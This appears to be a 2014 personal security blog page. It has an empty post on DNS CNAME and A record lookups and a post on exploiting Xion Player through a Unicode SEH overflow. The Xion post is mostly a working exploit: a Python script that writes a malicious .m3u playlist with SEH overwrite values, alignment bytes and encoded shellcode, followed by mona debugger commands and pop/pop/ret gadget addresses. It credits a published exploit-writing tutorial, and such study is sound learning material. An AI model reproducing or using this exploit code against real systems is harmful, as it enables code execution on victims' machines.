Thursday, December 18, 2014

DNS CNAME Record Query/Response


DNS CNAME Query


DNS CNAME Response

DNS A Record Query/Response


A Record Query for www.google.co.in


A Record Response for www.google.co.in



A Record Query for domain www.google.com


A Record Response for domain www.google.com


Friday, December 12, 2014

Xion Player Unicode Exploit

Unicode Exploitation Techniques


Below instructions make us point to shellcode
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe
import struct

total_buf_size=5000
# 228 offset
buf1 = "A" * 228
#nseh = "MM"
nseh = "\x61\x62"
# seh = "NN"
seh = "\x15\x45"
print "seh: ", len(seh)

prep_stack = "D"
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x55" #push ebp
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x58" #pop eax=> ebp into eax
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300
prep_stack = prep_stack + "\x6e" #pop/align
print "prep_stack len=", len(prep_stack)

prep_jump = "\x50"  #push eax
prep_jump = prep_jump + "\x6d"  #nop/align
prep_jump = prep_jump + "\xc3"  #ret
print "prep_jump len=", len(prep_jump)


# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D"*107

shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA"

remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode)))
payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
  fh = open("xion_uni_m3u.m3u", "w")
  fh.write(payload)
  fh.close()
except:
  print "Unable to create m3u file!\n"

To Generate cyclic pattern
!mona pc 1500

To find offset of in cyclic pattern at the time of crash
!mona findmsp

To search registers holding pop/pop/ret
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. Following is the list of address of our interest, search for string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret  |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret  | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret  | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)

This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.

References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html